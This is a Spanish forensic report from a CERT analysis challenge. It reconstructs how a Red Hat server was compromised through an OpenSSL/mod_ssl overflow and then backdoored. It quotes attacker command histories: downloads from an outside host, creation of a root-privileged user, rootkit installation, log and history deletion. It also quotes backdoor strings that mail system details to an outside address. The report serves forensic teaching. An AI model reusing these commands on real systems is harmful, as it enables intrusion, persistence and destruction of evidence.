Reto de Análisis Forense V2.0 UNAM CERT / IRIS CERT

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Reto de Análisis Forense V2.0 UNAM CERT / IRIS CERT"

Transcripción

1 Reto de Análisis Forense V2.0 UNAM CERT / IRIS CERT Informe Tecnico Ing.-Juan Angel Hurtado 1

2 1.- Introducción Descripción del documento Objetivo Audiencia Resumen Procedimiento Aplicado Preparación del laboratorio Búsqueda y análisis de evidencia Resumen y resultados Resumen y resultados Perfil y motivación del atacante Recomendaciones y conclusiones Agradecimientos. 33 Anexo Anexo Anexo Anexo

3 1.- Introducción Descripción del documento. Descripción: Informe Tecnico sobre el análisis forense realizado a una plataforma Linux comprometida, como participante en el Reto de Análisis Forense V2.0 propuesto por UNAM-CERT/IRIS-CERT y demás convocantes. Autor: Ing. Juan Angel Hurtado Sanchez Fecha de elaboración: 18/Feb/ Objetivo. El presente documento tiene como fin describir de una forma técnica el procedimiento usado y resultados obtenidos del análisis forense aplicado a la plataforma propuesta de modo que pueda ser usado como referencia por personas interesadas en la seguridad informática como una introducción en la realización análisis de dicho tipo Audiencia. La audiencia pretendida es cualquier persona con conocimientos de sistemas de cómputo interesada en la seguridad de dichos sistemas. Este documento pretende ser una referencia a fin de cumplir con el objetivo planteado en la convocatoria del Reto Forense V2.0 ( El objetivo de este Reto Forense V2,0 es motivar el desarrollo en el área de cómputo forense en Ibero América ) Resumen. En atención al Reto Forense V2.0 propuesto por UNAM-CERT / IRIS CERT se ofrece este documento que pretende ser una vista técnica del procedimiento y resultados obtenidos. El análisis de la plataforma en cuestión fue realizado sobre una plataforma Linux Fedora Core 3 utilizando para ello los comandos del sistema operativo (strings, cat, grep, ls, etc;), algunos scripts de autoría propia, así como el set de herramientas de The sleuthkit (Aun que se prefirió el uso de comandos del SO, a fin de que quienes utilicen 3

4 este documento como referencia no se formen una idea de dependencia hacia alguna herramienta). El análisis esta basado en una línea de tiempo del sistema comprometido, fechas de modificación de los archivos y la información extraída de la evidencia proporcionada para el Reto. Los hechos en este documento se describen siempre como supuestos, esto es debido a que ante la imposibilidad de observar el pasado, el analista forense recaba evidencia y puede suponer que fue lo que paso, sin embargo no puede darse el lujo de afirmar que lo que el supone es exactamente lo que paso. Se procura evitar formular acusaciones ya que la función del analista forense es la de tratar de describir y reconstruir hechos, las acciones de acusar, juzgar y condenar corresponden a las autoridades que cada País destine para ello. 2.- Procedimiento Aplicado Preparación del laboratorio. Primero es necesario instalar el sistema anfitrión que servirá como laboratorio de trabajo. Para esto se eligió un sistema Linux Fedora Core 3 montado sobre una partición de disco de 5 GB. La instalación se siguió de acuerdo al Anaconda (Anaconda es el instalador de Fedora). La documentación acerca de Fedora puede ser encontrada en El sistema tiene instalado además Windows XP, ahí se descargaron y descompactaron los archivos.dd a analizar por cuestiones de espacio (La partición de Windows XP es de 17 GB), sin embargo estos pueden ser accesazos desde Linux gracias a la compatibilidad con NTFS. Una vez descompactados se obtienen los siguientes archivos: hda1.dd hda2.dd hda3.dd hda5.dd hda6.dd firmas.txt A fin de verificar que los archivos no hayan sufrido modificaciones durante la descarga y/o descompresión se verifica la firma de cada uno con el comando md5sum. El resultado es comparado con el contenido del archivo firmas.txt: 4

5 #md5sum hda1.dd 639c0cb8e90158b96cc4f1a3acefc5f1 hda1.dd #md5sum hda2.dd a3b9a3464d6f8e2494bca7126ec621b1 hda2.dd #md5sum hda3.dd b90bbfb f c hda3.dd #md5sum hda5.dd 0c5ad84632aa4d6612f21f37c5bc4c4f hda5.dd #md5sum hda6.dd eb99858c421ae0a48ac dff57c hda6.dd Una firma distinta indicaría que el archivo no es idéntico al original, pudiendo ser que se descargara completo o hubiese sido alterado. Una vez corroboradas todas las firmas, se procede revisar los archivos.dd obtenidos (En un análisis forense completo, hubiese sido conveniente interrogar a los administradores y tomar mas evidencia, ante la imposibilidad de esto se procede con el análisis del sistema de archivos (File System) directamente). Para ello se monta el primero de los archivos.dd como un File System en loop mediante el comando mount y en modo de solo lectura para evitar alterar la escena del crimen : # mount -ro,loop hda1.dd /mnt/escena/ Ahora podemos acceder al contenido de hda1.dd a través de /mnt/escena/, en lo consecuente las referencias a / (root del sistema comprometido) serán referencias a /mnt/escena en el sistema anfitrión. Al acceder nos damos cuenta que la estructura pertenece a un sistema basado en Unix (Aun que por la descripción del Reto de antemano sabíamos que se trataba de un sistema Linux). El contenido de hda1.dd parece corresponder al File System raíz (root). En un primer reconocimiento ingresamos al directorio /etc y aplicamos el comando ls -lsa para listar el contenido del mismo. Usando el comando more accedemos al contenido de algunos archivos que nos parecen de interés. La existencia del archivo /etc/redhatrelease nos muestra que el sistema pertenece a la distribución de Linux Red Hat mientras que el contenido del archivo nos muestra la versión del mismo Red Hat Linux release 7.3 (Valhalla). Otro archivo de interés es /etc/sysconfig/network, cuyo contenido nos muestra el nombre de la maquina finanzas y el gateway que utilizaba En /etc/sysconfig/network-scripts/ 5

6 encontramos la configuración de la interfaz eth0 en los archivos ifcfg-eth0 y ifcfg-eth0:1, donde podemos ver que la maquina tenia 2 IP's en una sola interfaz de red física( y ), dichos archivos datan del 20 de Enero y a reserva de que hubiesen sido modificados nos dan una idea de cuando pudo haber sido el ultimo re-boot de la maquina. Los directorios /etc/cron.d/ y /etc/cron.daily/ contienen información acerca de los procesos que la maquina corría como cron, encontramos un proceso que analizaba los logs del sistema LogWatcher, logwatcher es un paquete que viene con las distribuciones de RedHat, analiza los logs del sistema operativo y envía un correo con un resumen de ellos, en este caso el correo era enviado a root. Finalmente revisamos los archivos /etc/mtab y /etc/fstab que nos muestran la distribución que tenia el File System. En /etc/mtab encontramos que la distribución era la siguiente: /dev/hda1 / ext3 rw 0 0 none /proc proc rw 0 0 usbdevfs /proc/bus/usb usbdevfs rw 0 0 none /dev/pts devpts rw,gid=5,mode= /dev/hda2 /home ext3 rw 0 0 none /dev/shm tmpfs rw 0 0 /dev/hda5 /usr ext3 rw 0 0 /dev/hda3 /var ext3 rw 0 0 En con esto comprobamos que el archivo hda1.dd corresponde al file system /, ahora sabemos además que hda2.dd corresponde a /home, hda3.dd a /var y hda5.dd a /usr. En /etc/fstab encontramos además que hda6.dd estaba destinado a swap. Con esto ya podemos reconstruir todo el file system usando el comando mount como lo hicimos con hda1.dd, dado que durante el análisis tendremos que montar y desmontar los dd con cierta frecuencia realizamos dos scripts para automatizar la tarea (Únicamente hda6.dd no será montado por tratarse de swap ). Dichos scripts aparecen en este mismo documento en el Anexo 1. Instalamos además las herramientas que usaremos para el análisis (Sleuthkit y Autopsy) las herramientas y las instrucciones para su instalación pueden ser encontradas en 6

7 Finalmente pluma y papel para tomar notas y con esto ya tenemos nuestro laboratorio listo. Montamos los File System s a analizar con nuestro script monta.sh (En el Anexo 1 encontrara información para modificar el script a su conveniencia): #./monta.sh Podemos ahora iniciar la búsqueda y análisis de evidencia. 2.2 Búsqueda y análisis de evidencia. La fecha de los archivos /etc/sysconfig/networkscripts/ifcfg-eth0 y /etc/sysconfig/network-scripts/ifcfg-eth0:1 nos indica la ultima vez que se iniciaron los servicios de red en el sistema, lo cual puede ser un indicativo de la ultima vez que se reinicio el equipo (Mas adelante buscaremos evidencia de ello). sabemos que las imágenes estuvieron disponibles a partir del 1 de Febrero del año en curso por lo que de momento suponemos que el ataque sucedió entre el 20 de Enero y el 1 de Febrero de este año. Nos dirigimos a /var/log a fin de analizar los log's del equipo, sin embargo encontramos que no existen log's en dicho directorio solamente se encuentran dos archivos: # ls -lsa total rwxr-xr-x 1 root root Jan 29 15:26 4 drwxr-xr-x 2 root root 4096 Jan 31 04:02. 4 drwxr-xr-x 20 root root 4096 Jan 20 09: rw-r--r-- 1 root root 9209 Jan 31 04:02 rpmpkgs El archivo rpmpkgs contiene las firmas de los paquetes que originalmente han sido instalados en la maquina, una practica interesante es verificar que las firmas correspondan a lo que se tiene actualmente instalado (De esa forma es posible detectar si algún programa a sido adulterado), sin embargo el archivo rpmpkgs del sistema aparece con fecha 31 de Enero, como anteriormente supusimos que el ataque se dio entre el 20 de Enero y el 1 de Febrero existe posibilidad que dicho archivo haya sido adulterado para burlar el análisis forense, por tanto de momento descartamos 7

8 dicho ejercicio. Por otro lado resulta bastante sospechosa la primer línea ya que muestra un archivo con nombre (vació) de fecha ENE- 29, pudiendo ser algún programa que el atacante tratara de ocultar nombrándolo de esa forma. El comando more nos muestra que no se trata de un archivo de texto asi que de momento vaciamos el contenido del archivo mediante la sentencia strings < > archivomisterioso.txt. Al analizar el contenido de archivomisterioso.xtx encontramos que probablemente sea una herramienta utilizada por el atacante para abrir un backdoor, de momento guardamos la información y continuamos con el análisis, las siguientes líneas fueron encontradas en dicho archivo. socket bind listen Port for Alinutu :P PID = %d touch /tmp/.info; hostname -i >> /tmp/.info; uname -a >> /tmp/.info; cat /etc/*release >> /tmp/.info; /sbin/ifconfig grep inet >> /tmp/.info; cat /tmp/.info mail -s 'Port nou' radautiteam@yahoo.com /usr/tmp /dev/null HOME=%s Nu pot forta PTY, pa-pa! Los archivos contenidos en /var/log indican que el atacante probablemente llego a tener privilegios de superusario y haya borrado los archivos de log de la maquina. Trataremos de recuperar lo que sea posible de estos archivos de los archivos hda3.dd y hda6.dd, damos un primer vistazo con el comando strings < hda3.dd grep 'finanzas' more, aplicamos también para hda6.dd (swap). El buscar cadenas de texto basados en patrones también va a ser una tarea que haremos varias veces durante el análisis, asi que usaremos un pequeño script de autoría propia para ello. El script hecho en perl aparece en el Anexo 2 de este documento, básicamente le daremos un archivo de entrada, uno de salida y el patrón a buscar, lo que hará el strip será buscar en el archivo de entrada aquellas líneas que contengan la palabra clave y las depositara en el archivo de salida, usaremos como patrón de búsqueda la palabra finanzas, que es el nombre del host's según lo encontramos anteriormente: #./parser.pl finanzas hda3.dd finanzashda3dd.txt & #./parser.pl finanzas hda6.dd finanzashda6dd.txt & 8

9 Mientras que de hda6.dd no obtuvimos mas que 3 líneas sin relevancia, de hda3.dd (Que es el File System que originalmente contenía los log's) pudimos recuperar fragmentos de los archivos de log de la maquina. El log recuperado confirma que la maquina sufrió un re-boot el 20 de Enero alrededor de las 16:33 (Tiempo de la Ciudad de México según el reloj del sistema comprometido, todos los tiempos serán referentes a esta zona horaria ya que es la que se encontró en el archivo /etc/sysconfig/clock de la maquina). Alrededor de las 16:44 levanta los servicios de MySQL, un Web Server (Probablemente Apache), sendmail, cron, anacron, y ssh. Casi una hora mas tarde comienza un ataque de diccionario (Password Guessing), un ataque de este tipo intenta adivinar el password (Haciendo conexiones vía ssh en este caso) probando posibles combinaciones de usuarios/passwords provenientes de una lista hecha (diccionario), el ataque proviene de varios orígenes y duraría varios días. Dado que no encontramos log s en el equipo revisamos el archivo /var/mail/root puesto que según data en los directorios /etc/cron.d y /etc/cron.daily en la maquina corrían varios procesos que generaban estadísticos del sistema (Logwatcher) y los enviaban por correo a root, esperamos que el superusuario root aun conserve alguno de ellos. Descubrimos que dicho archivo contiene bastante información del ataque de diccionario, sin embargo al revisar de forma mas detallada el archivo /var/mail/root nos damos cuenta de que entre intentos se repiten los usuarios, probablemte el atacante este dando vueltas al mismo diccionario, o varios atacantes estén usando el mismo diccionario. Por esta razón descartamos que el incidente se haya producido a partir de dicho ataque (Ya que el (los) atacante(s) estuvieron repitiendo el mismo diccionario), aun asi se anexa en este mismo documento un resumen de dicho ataque en el Anexo 4. Continuando con el archivo /var/mail/root, existen correos del Log Watcher hasta el 29 de Enero a las 4:02 AM, curiosamente a partir del mismo 29 pero a las 15:30 horas aparecen mensajes como el que sigue: From root Sat Jan 29 15:30: Return-Path: <root@localhost.localdomain> Received: (from root@localhost) by localhost.localdomain (8.11.6/8.11.6) id j0tlu0h

10 for root; Sat, 29 Jan :30: Date: Sat, 29 Jan :30: Message-Id: From: (Cron Daemon) To: Subject: Cron /usr/lib/sa/sa1 1 1 X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=root> Cannot open /var/log/sa/sa29: No such file or directory Los mensajes continúan hasta el día 31 de Enero a las 15:20. Ahora bien, tenemos actividad del log-watcher hasta el día 29 (Cuando procesó los logs del día anterior 28 de Enero), el mismo día 29 la herramienta sysstat que corría cada 10 min. según el archivo /etc/cron.d/sysstat comienza a reportarla falta de archivos en el directorio de /var/log a partir de las 15:30, en el mismo directorio se encontró una herramienta de Hacking oculta bajo el nombre (vació), dicha herramienta data del mismo día 29 de Enero a las 15:26. Partiendo de esto generamos dos ejercicios de investigación, por un lado generamos una lista de archivos cuya fecha de sea 29 de Enero, y por otro lado utilizamos nuestro script para buscar dentro de hda3.dd y hda6.dd usando el patrón 'Jan 29', los comandos a utilizar son: 1) #ls -lrsa /mnt/escena/ grep 'Jan 29' > $HOME/archivosdel29.txt 2) #parser.pl 'Jan 29' hda3.dd Jan29hda3.txt 3) #parser.pl 'Jan 29' hda6.dd Jan29hda6.txt Una vez que ordenamos y depuramos los resultados que nos genera el comando 1 (Dicha lista aparece completa en el Anexo 3), encontramos la siguiente cronología: A las 4:02 AM se ejecuta el webalizer (Que es un analizador de logs para Web Server's). A las 15:16 una serie de archivos en el directorio /dev/ accedidos, llama la atención también el /bin/gawk, por otro lado se encuentran los archivos /dev/hdx1 y /dev/hdx2, estos archivos son creados por el virus RST.b: 10

11 29 ene 15:16 /bin/gawk ene 15:16 /bin/gawk 29 ene 15:16 /dev/hdx2 29 ene 15:16 /dev/hdx1 A las 15:17 aparecen los siguientes archivos, parecen indicar la creación del un usuario weed : 29 ene 15:17 disco1/home 29 ene 15:17 disco1/var/spool/mail/weed 29 ene 15:17 disco1/home/weed 29 ene 15:17 disco1/home 29 ene 15:17 disco1/home/lost?.. 29 ene 15:17 disco1/home/contador.. 29 ene 15:17 disco1/home/weed/.bashrc 29 ene 15:17 disco1/home/weed/.bash_profile 29 ene 15:17 disco1/home/weed/.bash_logout Entre 15:20 y 15:21 una gran cantidad de archivos en /usr/include son modificados. Posteriormente a las 15:22 aparecen archivos.bash_history en /root a las 15:25, se modifican una varios archivos dentro de /etc y aparece otro bash_history esta ves en /. Analicemos ahora la actividad que quedo registrada en los.bash_history siendo el primero el encontrado en /root que se cerro a las 15:22. y el segundo el que se encuentra en / que se cerro a las 15:27, ambos pertenecieron al súper usuario root. Se intercalan comentarios en rojo: Archivo /root/.bash_history ls lista el contenido del directorio dir lista el contenido del directorio ps xc lista los procesos que corren bajo el usuario (root en este caso) wget xhack.150m.com/sc.tgz descarga sc.tgz desde xhack.150m.com, este archivo contiene un colección de shell codes o utilerías para el hacker, con varios propósitos desde expulsar la unidad de CD- ROOM, evadir IDS, ejecutar código etc; tar -zxvf sc.tgz desempaqueta el contenido de sc.tgz cd sc ingresa al directorio sc./inst instala lo que parece ser un sniffer que se carga en memoria. Este archivo estaba contenido en sc.tgz./sk ejecuta el script sk, con esto pone un funcion el sniffer w lista a los usuarios que se encuentran logueados en la maquina, 11

12 probablemente para ver quien esta con el en ese momento. wget xhack.150m.com/https Descarga del mismo sitio el script https perl https Ejecuta el script https que aparenta ser un perl script que funge como backdoor contiene funciones de cliente de IRC, la configuración del mismo le permitiría conectarse a eu.undernet.org y ejecutar algunas funciones como escaneo de puertos y ejecución de un ataques y comandos de manera remota. Al analizar el script básicamente se deduce que al ejecutarlo se conecta a eu.undernet.org como el usuario bitch, el atacante entonces puede iniciar una conversación con el y a través de el ejecutar comandos, escáner puertos y/o ejecutar ataques. cd.. rmrm -rf sc* Elimina la evidencia acerca de sc.tgz Archivo /.bash_history id Verifica la identidad del usuario /usr/sbin/adduser -g 0 -u 0 -o weed Agrega un usuario weed con privilegios de root. Probablemente para conservar el acceso remoto al equipo. passwd weed Asigna password a el usuario weed /sbin/ifconfig grep "inet" Verifica las IP s del equipo ls sa Lista el contenido del directorio. dir Lista el contenido del directorio. /usr/sbin/userdel weed Elimina al usuario que acaba de crear. ls sa Lista el contenido del directorio. dir Lista el contenido del directorio. rm -rf za* Elimina todo archivo o directorio que comienza con za. rm -rf own Elimina todo archivo o directorio own. /usr/sbin/adduser -g 0 -u 0 -o weed Vuelve a crear el usuario weed. passwd weed Assign password a el usuario weed wget Descarga crk.tar.gz. Este archivo contiene un rootkit y un backdoor, este archivo trae algunas cosas bastante interesantes que detallamos mas abajo. Un análisis con el antivirus nos muestra que estos archivos están infectados con alguna variante del virus RST.b tar xzvf crk.tar.gz Desempaqueta el archivo. cd crk Ingresa al directorio crk../install eliteaza 1 Ejecuta el instalador, el primer argumento es un password a usarse par realizar conexiones de ssh, el segundo argumento es el puerto en que se levanta el backdoor de ssh. Este script debe de ser ejecutado como root revisando el código del shell script install encontramos las siguientes líneas: 12

13 killall -9 syslogd (Esta linea mata el syslog) rm -rf /var/log/* (Esta linea elimina los logs) unset HISTFILE (Esta linea desactiva el guardado del historial) unset HISTSAVE (Esta linea desactiva el guardado del historial) rm -rf /bash.history Elimina el historial de comandos rm -rf /root/.bash_history Elimina el historial de comandos, asi que probablemente aquí fue donde se eliminaron los logs de el equipo. id Verifica el usuario nuevamente. Parece que algo salio mal. su Intenta convertirse en root. Aun que todo párese indicar que ya root en ese momento cd crk Otra vez intenta instalar dir./install eliteaz 9933 Esta vez instala en el puerto 9933 ssh -l weed localhost Intenta conectarse con el usuario weed ls sa Lista el contenido dir Lista el contenido nuevamente. Es evidente que algo no va bien. passwd weed Cambia el password y reintenta la conexión. ssh -l weed localhost eliteazazel Finalmente opta por eliminar el usuario weed userdel weed /usr/sbin/userdel weed Nuevamente lista el contenido y esta vez elimina un archivo own y sc/* puede haber sido otro intento de instalar el mismo troyano descrito anteriormente. ls =-sa dir rm -rf own cd sc dir cd.. rm -rf sc* Se cambia al directorio /var/log crea un directorio daemon, descarga el archivo pico, lo oculta llamándolo y finalmente lo ejecuta. Este archivo es el que habíamos encontrado anteriormente y al cual llamamos archivo misterioso, como ya vimos se trata de un backdoor. cd /var/log dir mkdir daemon wget chmod +x pico mv pico " " export PATH="." " " Mata el proceso zbind. zbind es una utilería generalmente contenida en za.tgz junto a los archivos za, y zero (Aquí se 13

14 explica que anteriormente halla borrado todo lo referente a za*.), existe poca información al respecto, sin embargo parece tratarse de un backdoor que abre un puerto en la maquina para recibir conexiones telnet en el puerto 4000 y obtener una shell como root. Es de notar que no haya evidencia de que haya bajado dicha utilería, ni evidencia de su ejecución. Por tanto es probable que dichas acciones hayan sido tomadas como otro usuario del sistema y a través de ellas haya obtenido el acceso como root (Elevación de privilegios). /usr//sbin/killall -9 zbind /usr/sbin/killall -9 zbind /usr/bin/killall -9 zbind bash Bien hasta aquí sabemos que el sistema fue comprometido el día 29 de Enero entre las 15:00 y las 15:30, también tenemos un historial de lo que realizo el atacante al menos hasta las 15:27, Continuemos con nuestra revisión, a las 15:25 se modificaron una gran cantidad de archivos en /etc, probablemente se deba a la instalación de un rootkit: 29 ene 15:25 /etc/dhcpc.. 29 ene 15:25 /etc/default.. 29 ene 15:25 /etc/skel.. 29 ene 15:25 /etc/iproute ene 15:25 /etc/makedev.d.. 29 ene 15:25 /etc/hotplug.. 29 ene 15:25 /etc/security.. 29 ene 15:25 /etc/openldap.. 29 ene 15:25 /etc/alternatives A las 15:36 se instala w00t, un sniffer con escáner de puertos. Que como veremos más adelante también proporciona una herramienta para realizar un exploit a servidores de samba vulnerables: 29 ene 15:36 /var/tmp w00t 29 ene 15:36 /var/tmp/w00t pscan ene 15:36 /var/tmp/w00t. Y finalmente un huellas de un servidor Proxy de IRC el psybnc: 29 ene 15:46 /var/tmp/psybnc/psybnc.pid 29 ene 15:46 /var/tmp/psybnc/log/psybnc.log 29 ene 15:48 /var/tmp/psybnc/log 29 ene 15:48 /var/tmp/psybnc/log/user1.trl 29 ene 15:48 /var/tmp/psybnc/log. 29 ene 15:49 /var/tmp/psybnc motd 14

15 29 ene 15:49 /var/tmp/psybnc/motd/user1.motd 29 ene 15:49 /var/tmp/psybnc/motd. 29 ene 17:53 /var/tmp/psybnc/psybnc.conf.old 29 ene 17:53 /var/tmp/psybnc/psybnc.conf Con eso termina la actividad del atacante el día 29. En este punto podemos ya generar un perfil del atacante, si usamos la clasificación que comúnmente se usa para denominar a los Hackers según sus habilidades y conocimientos, y asumimos tres niveles siendo Elite Hackers el nivel mas alto, Hackers el nivel medio y Script Kiddie's el nivel mas bajo. Es evidente que nuestro atacante se ubicaría en el nivel mas bajo Script Kiddie's. Las razones para ubicarlo ahí son: a) El atacante utilizo herramientas y utilerías disponibles en la red. Mientras que los Hacker's, y los Elite Hacker's prefieren utilizar herramientas escritas por ellos, los Script Kiddie's utilizan generalmente herramientas que encuentran en la red y medio conocen su funcionamiento. Las razones de un Hacker para preferir una herramienta escrita por el son varias, una herramienta que se encuentre en la red podrá ser rastreada (Como lo hicimos aquí), probablemente deje una firma que pueda ser detectada, el escribir sus propias herramientas da mas realce al nombre del Hacker (Lo ubica como Elite), etc; b) En varias ocasiones el atacante parece no saber que hacer. Mas que un atacante con plan de actividades bien realizado (Es decir un atacante que haya planeado vulnerar intencional y específicamente este equipo), da la impresión de que llego ahí por mera casualidad, y, una vez dentro trato de hacer cuando pudo, no seria una sorpresa que hubiese usado un escáner de vulnerabilidades probando varias redes hasta que dio con nuestra maquina. c)las consecuencias legales de un ataque informático pueden ser varias. El muy dudoso que algún Hacker de Elite se arriesgara a enfrentar un proceso Judicial por chatear en el IRC. Dicho esto prosigamos con el análisis, dado que ya sabemos que el ataque se produjo el día 29 de Enero, repetiremos el ejercicio de análisis de fechas para los días 30 y 31 a fin de recabar más información los comandos a utilizar son: #ls -lrsa /mnt/escena/ grep 'Jan 30' > $HOME/archivosdel30.txt #ls -lrsa /mnt/escena/ grep 'Jan 31' > $HOME/archivosdel31.txt 15

16 Los resultados de estos los analizamos mas adelante, para seguir un orden veamos ahora lo que obtuvimos al parsear los archivos hda3.dd y hda6.dd con nuestro script. Nuevamente hda6.dd (swap) nos queda mal, no pudimos obtener nada de ahí, pero de hda3.dd(/var), encontramos algo muy interesante, los del Apache Web Server, dichos log's son fuerte indicativo acerca de la forma en que el atacante llego a la victima, intercalo comentarios en rojo: [Sat Jan 29 12:11: ] [error] [client ] File does not exist: /var/www/html/pk/service (aquí busca el archivo pk/service que forma parte de una vulnerabilidad es una muestra de que el servidor estaba bajo escaneos de vulnerabilidades) [Sat Jan 29 12:11: ] [error] [client ] File does not exist: /var/www/html/pk/service(lo mismo que el anterior) [Sat Jan 29 14:57: ] [error] [client ] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /(Aquí el atacante envía una consulta de HTTP/1.1 mal formado, note que el log indica la falta del tag Host) [Sat Jan 29 14:57: ] [error] [client ] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /(Lo mismo que el anterior con un segundo de diferencia, otra indicación de un escáner de vulnerabilidades (Tuvo que ser automatizado, nadie teclea tan rápido)) [Sat Jan 29 14:58: ] [error] mod_ssl: SSL handshake failed (server :443, client ) (OpenSS L library error follows)(se produce un crash en mod_ssl, note como el error hace referencia al handshake) [Sat Jan 29 14:58: ] [error] OpenSSL: error: f:lib(20):func(105):reason(143)(openssl falla) [Sat Jan 29 15:00: ] [error] mod_ssl: SSL handshake failed (server :443, client ) (OpenSS L library error follows) (Se repiten las líneas anteriores, rcordemos que al atacante mando dos o mas consultas de HTTP en menos de un segundo, note la hora del ultimo error 15:14, apenas unos minutos antes de que comenzara la actividad anormal en el equipo) [Sat Jan 29 15:00: ] [error] OpenSSL: error: f:lib(20):func(105):reason(143) [Sat Jan 29 15:10: ] [error] mod_ssl: SSL handshake failed (server :443, client ) (OpenSS L library error follows) [Sat Jan 29 15:10: ] [error] OpenSSL: error: f:lib(20):func(105):reason(143) 16

17 [Sat Jan 29 15:14: ] [error] mod_ssl: SSL handshake failed (server :443, client ) (OpenSS L library error follows) [Sat Jan 29 18:19: ] [error] System: No existe el fichero o el directorio (errno: 2)(Despues de varias fallas el Apache + mod_ssl parece no volver a recuperarse) [Sat Jan 29 18:19: ] [error] mod_ssl: Child could not open SSLMutex lockfile /etc/httpd/logs/ssl_mutex.723 (Sys tem error follows) [Sat Jan 29 18:19: ] [error] System: No existe el fichero o el directorio (errno: 2) [Sat Jan 29 18:19: ] [error] mod_ssl: Child could not open SSLMutex lockfile /etc/httpd/logs/ssl_mutex.723 (Sys tem error follows) [Sat Jan 29 18:19: ] [error] System: No existe el fichero o el directorio (errno: 2) [Sat Jan 29 18:19: ] [error] mod_ssl: Child could not open SSLMutex lockfile /etc/httpd/logs/ssl_mutex.723 (Sys tem error follows) [Sat Jan 29 18:19: ] [error] System: No existe el fichero o el directorio (errno: 2) [Sat Jan 29 18:19: ] [error] mod_ssl: Child could not open SSLMutex lockfile /etc/httpd/logs/ssl_mutex.723 (Sys tem error follows) Se recuperan además unas líneas del psybnc, como ya sabemos que el atacante instalo este servidor Proxy de IRC no exponemos esas líneas, sin embargo como la mayoría del material aquí expuesto se adjunta la evidencia en los archivos de apoyo enviados junto a este reporte. Volviendo a lo que nos ocupa, es evidente que la falla en el Apache se relaciona de algún modo con las actividades del atacante, tomamos nota de la IP que corresponde según a un proveedor de Hosting en Reno Nevada EEUU llamado Altaway, y ejecutamos nuestro script esta vez usando como palabra clave Jan, esto lo hacemos recordando que el sistema inicio el 20 de Enero asi que esperamos encontrar una linea [notice] del log de Apache que nos ayude a identificar la versión del mismo. Encontramos una linea del 23 de enero que nos indica además la versión de OpenSSL usada: [Sun Jan 23 04:02: ] [notice] Apache/ (Unix) (Red-Hat/Linux) mod_ssl/2.8.7 OpenSSL/0.9.6b DAV/1.0.3 PH P/4.1.2 mod_perl/1.26 configured -- resuming normal operations además en el archivo /etc/httpd/conf/httpd.conf encontramos evidencia de que el servicio de SSL estaba activo: 17

18 <IfDefine HAVE_SSL> Listen 80 Listen 443 </IfDefine> Con esta información nos dirigimos a la red, en busca de vulnerabilidades conocidas para la combinación Apache/ (Unix) (Red-Hat/Linux) mod_ssl/2.8.7 OpenSSL/0.9.6b Y encontramos que dicha combinación es vulnerable debido a un fallo que permite obtener una shell remota al realizar un HandShake de ssl enviando un paquete especialmente malformado, dicha vulnerabilidad se encuentra documenta en encontramos que existen varios exploit's para esta vulnerabilidad e incluso un gusano llamado slapper-worm. Sin embargo las líneas de log que obtuvimos del log de Apache coinciden particularmente con las firmas del exploit openssl-too-open o alguna de sus variantes, este exploit escrito por Solar Eclipse se aprovecha de la vulnerabilidad existente en la versión de OpenSSL/0.9.6 que permite mediante el envió paquetes especialmente formados provocar un Buffer Overflow en el OpenSSL Handshake al enviar una KEY_ARG especialmente larga, y asi obtener una shell con el usuario que corre el Apache Web Server regularmente nobody o como en este caso apache, para poder realizar el exploit es necesario enviar dos solicitudes de SSL, la primera provocara el buffer overflow y la segunda llevar una carga especial de código shell (Esto explicaría el hecho de las solicitudes hechas al Apache en lapsos de un segundo). Un punto interesante del exploit, es que la actividad realizada por el usuario nobody o apache no queda registrada. Una vez que el atacante ha obtenido acceso al equipo puede modificar las paginas Web, o descargar/subir herramientas para obtener privilegios de root. Este exploit regularmente incluye otra herramienta openssl-scanner a la que se le pueden suministrar varias IP's para automatizar la tarea (Este pudiera ser el escáner de vulnerabilidades que habíamos supuesto uso). No es la intención de este documento centrarse en la descripción de dicho exploit asi que solo se describe a grandes 18

19 rasgos su funcionamiento, sin embargo se recomienda ampliamente leer el documento llamado Traveling Through the OpenSSL Door escrito por Keven Murphy para SANS Institute que describe de forma bastante detallada el exploit y la vulnerabilidad, dicho documento puede ser hallado en Adicionalmente hemos encontrado que este exploit se ha empaquetado con otras herramientas para realizar escaneos masivos de host's, en búsqueda de maquinas vulnerables (Un ejemplo es el paquete atd.tgz, cuya descripción se encuentra en ) Siguiendo las líneas de log que coinciden con las firmas del exploit antes mencionado encontramos que la última quedo registrada a las 15:14:57: [Sat Jan 29 15:14: ] [error] mod_ssl: SSL handshake failed (server :443, client ) (OpenSS L library error follows) Apenas dos minutos antes de comenzara la actividad anormal en el equipo. Llegado este punto recapitulamos brevemente nuestros hallazgos. Suponemos que el atacante estaba realizando un escaneo buscando especialmente explotar la vulnerabilidad de Apache/ OpenSSL 0.9.6b cuando se topo con nuestro Host, usando el exploit opensslto-open vulnero exitosamente el equipo y obtuvo una shell bajo el usuario apache (Que era el usuario que corría el Web Server). Descargo e instalo la serie de utilerías contenidas en za.tgz. y ejecuto el backdoor zbind que le permitió abrir una shell en el puerto 4000 con probables permisos de root o ejecuto alguna de las otras herramientas para obtener los permisos del superusuario. A partir de ahí descargo y ejecuto una serie de herramientas para mantener el acceso remoto(de las cuales una estaba infectada con una variante del virus RST.b), dio de alta un usuario weed con privilegios de superusuario y finamente instalo un IRC Proxy Server. Para corroborar nuestra teoría de que el sistema esta además infectado con un virus realizamos una prueba ejecutando el comando strings < gawk more (Elegimos este archivo por ser de los primeros en ser modificados). Y ahí encontramos la firma del virus: /dev/hdx SQRVW ZY[= ZY[= _^ZY[ SQRVW 19

